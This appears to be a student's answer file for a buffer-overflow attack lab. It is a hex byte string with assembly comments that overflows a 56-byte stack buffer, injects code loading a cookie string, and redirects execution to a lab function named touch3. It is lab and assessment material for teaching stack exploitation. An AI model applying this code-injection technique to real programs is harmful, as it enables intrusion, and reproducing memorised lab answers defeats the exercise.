/* 56 bytes til return address */
33 33 33 33 33 33 33 33 /* Padding */
48 b8 33 38 31 65 38    /* movabs $px3530333865313833,% rax mov 35 30 33 38 65 31 38 33 to rax */
33 30 35
48 89 44 24 10          /* mov %rax,0x10(%rsp) */
48 c7 44 24 18 00 00    /* movq   $0x0,0x18(%rsp) */
00 00
48 8d 7c 24 10          /* lea    0x10(%rsp),%rdi */
c3                      /* retq */
/* total bytes 8+7+3+5+7+2+5+1=38 */
00 00 00 00 00 00 00 00 /* padding */
00 00 00 00 00 00 00 00
00 00
/* wanted return address (top of stack plus instructions) 0x55611e80 */
80 1e 61 55 00 00 00 00
/* return to touch3 0x00000000004016b9 */
b9 16 40